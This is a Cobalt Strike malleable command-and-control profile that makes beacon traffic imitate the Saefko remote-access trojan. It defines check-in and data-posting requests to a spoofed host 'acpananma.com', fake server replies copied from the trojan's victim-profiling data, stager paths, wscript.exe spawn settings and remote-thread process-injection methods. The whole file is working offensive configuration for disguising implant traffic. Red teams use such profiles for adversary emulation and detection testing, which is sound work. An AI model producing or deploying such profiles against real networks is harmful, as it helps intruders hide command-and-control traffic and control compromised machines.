214 lines
4.7 KiB
Plaintext
214 lines
4.7 KiB
Plaintext
|
#saefko.profile
|
||
|
#https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat
|
||
|
#xx0hcd
|
||
|
|
||
|
###global options###
|
||
|
set sleeptime "5000";
|
||
|
set jitter "33";
|
||
|
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
|
||
|
|
||
|
set sample_name "saefko.profile";
|
||
|
|
||
|
http-get {
|
||
|
|
||
|
set uri "/love/server.php";
|
||
|
|
||
|
set verb "GET";
|
||
|
|
||
|
client {
|
||
|
|
||
|
header "Host" "acpananma.com";
|
||
|
|
||
|
|
||
|
metadata {
|
||
|
base64url;
|
||
|
parameter "pass";
|
||
|
}
|
||
|
|
||
|
parameter "command" "UpdateHTTPIRCStatus";
|
||
|
parameter "machine_id" "202";
|
||
|
parameter "irc_status" "1";
|
||
|
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
header "Server" "Apache";
|
||
|
header "X-Powered-By" "PHP/5.6.36";
|
||
|
header "Vary" "Accept-Encoding";
|
||
|
header "Content-Type" "text/html; charset=UTF-8";
|
||
|
|
||
|
output {
|
||
|
|
||
|
netbios;
|
||
|
|
||
|
prepend "ok\n";
|
||
|
prepend "2\n";
|
||
|
|
||
|
append "0\n";
|
||
|
|
||
|
print;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
http-post {
|
||
|
|
||
|
set uri "/Love/server.php";
|
||
|
#set verb "GET";
|
||
|
set verb "POST";
|
||
|
|
||
|
client {
|
||
|
|
||
|
header "Content-Type" "application/x-www-form-urlencoded";
|
||
|
header "Host" "acpananma.com";
|
||
|
header "Expect" "100-continue";
|
||
|
header "Connection" "Keep-Alive";
|
||
|
|
||
|
|
||
|
output {
|
||
|
base64url;
|
||
|
parameter "command";
|
||
|
|
||
|
}
|
||
|
|
||
|
id {
|
||
|
base64url;
|
||
|
parameter "pass";
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
header "Host" "acpananma.com";
|
||
|
|
||
|
output {
|
||
|
netbios;
|
||
|
|
||
|
prepend "\nHTTP/1.1 100 Continue\n\n";
|
||
|
|
||
|
#checked to make sure the misspells were misspelled, uh, correctly?
|
||
|
append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1";
|
||
|
print;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
http-stager {
|
||
|
|
||
|
set uri_x86 "/clients2.google.com/generate_204";
|
||
|
set uri_x64 "/clients3.google.com/generate_204";
|
||
|
|
||
|
client {
|
||
|
|
||
|
header "Host" "acpananma.com";
|
||
|
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
header "Server" "Apache";
|
||
|
header "X-Powered-By" "PHP/5.6.36";
|
||
|
header "Vary" "Accept-Encoding";
|
||
|
header "Content-Type" "text/html; charset=UTF-8";
|
||
|
|
||
|
output{
|
||
|
prepend "ok\n";
|
||
|
prepend "2\n";
|
||
|
|
||
|
append "0\n";
|
||
|
print;
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
###Malleable PE Options###
|
||
|
|
||
|
post-ex {
|
||
|
|
||
|
set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
|
||
|
set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
|
||
|
|
||
|
set obfuscate "false";
|
||
|
|
||
|
set smartinject "false";
|
||
|
|
||
|
set amsi_disable "false";
|
||
|
|
||
|
}
|
||
|
|
||
|
#used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/
|
||
|
stage {
|
||
|
set checksum "0";
|
||
|
set compile_time "12 Feb 2019 14:33:03";
|
||
|
set entry_point "159022";
|
||
|
set image_size_x86 "548864";
|
||
|
set image_size_x64 "548864";
|
||
|
#set name "";
|
||
|
set userwx "false";
|
||
|
set cleanup "false";
|
||
|
set stomppe "false";
|
||
|
set obfuscate "false";
|
||
|
set rich_header "";
|
||
|
|
||
|
set sleep_mask "false";
|
||
|
|
||
|
# set module_x86 "";
|
||
|
# set module_x64 "";
|
||
|
|
||
|
transform-x86 {
|
||
|
# prepend "\x90\x90\x90";
|
||
|
# strrep "ReflectiveLoader" "6ayBRVW";
|
||
|
# strrep "beacon.dll" "uVRWRut";
|
||
|
}
|
||
|
|
||
|
transform-x64 {
|
||
|
# prepend "\x90\x90\x90";
|
||
|
# strrep "ReflectiveLoader" "6ayBRVW";
|
||
|
# strrep "beacon.x64.dll" "uVRWRut";
|
||
|
}
|
||
|
|
||
|
#can set a string in the .rdata section of the beacon dll.
|
||
|
#adds a zero-terminated string
|
||
|
#string "something";
|
||
|
|
||
|
#adds a string 'as-is'
|
||
|
#data "something";
|
||
|
|
||
|
#adds a wide (UTF-16LE encoded) string
|
||
|
#stringw "IMAGE_SCN_MEM_READ";
|
||
|
}
|
||
|
|
||
|
|
||
|
#controls process injection behavior
|
||
|
process-inject {
|
||
|
|
||
|
# set allocator "NtMapViewOfSection";
|
||
|
|
||
|
# set min_alloc "16700";
|
||
|
|
||
|
set userwx "false";
|
||
|
|
||
|
set startrwx "true";
|
||
|
|
||
|
transform-x86 {
|
||
|
# prepend "\x90\x90\x90";
|
||
|
}
|
||
|
transform-x64 {
|
||
|
# prepend "\x90\x90\x90";
|
||
|
}
|
||
|
|
||
|
execute {
|
||
|
# CreateThread "ntdll!RtlUserThreadStart";
|
||
|
CreateThread;
|
||
|
NtQueueApcThread;
|
||
|
CreateRemoteThread;
|
||
|
RtlCreateUserThread;
|
||
|
}
|
||
|
}
|